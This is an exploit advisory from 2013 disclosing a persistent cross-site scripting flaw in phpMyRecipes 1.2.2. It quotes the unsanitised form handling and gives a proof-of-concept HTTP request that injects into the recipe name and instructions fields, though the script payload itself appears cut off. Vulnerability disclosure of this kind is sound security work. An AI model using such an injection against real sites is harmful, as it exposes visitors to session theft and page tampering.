Exploit title: phpMyRecipes 1.2.2 Persistent XSS Date: 2/2013 Author: PDS - trollsandpwnies@gmail.com Severity: medium Software link: https://php-myrecipes.svn.sourceforge.net/svnroot/php-myrecipes/phpMyRecipes-main addrecipe.php and editrecipe.php are vulnerable to persistent cross site scripting. User supplied input is not sanitized before being displayed on the page. ex: $r_id = $_POST['r_id']; $r_name = $_POST['r_name']; $r_category = $_POST['r_category']; $r_servings = $_POST['r_servings']; $r_ingredients = $_POST['r_ingredients']; $r_instructions = $_POST['r_instructions']; $r_description = $_POST['r_description'] --------------------------------------------------- POC ---- Register,sign in, and add a new recipe or simply modify an existing recipe. In the recipe name or instructions field inject javascript. POST /recipes/addrecipe.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded r_name=">&r_category=13&r_servings=1&r_difficulty=1&i_qty=&i_unit=4&i_item=0&i_item_text=&r_instructions=">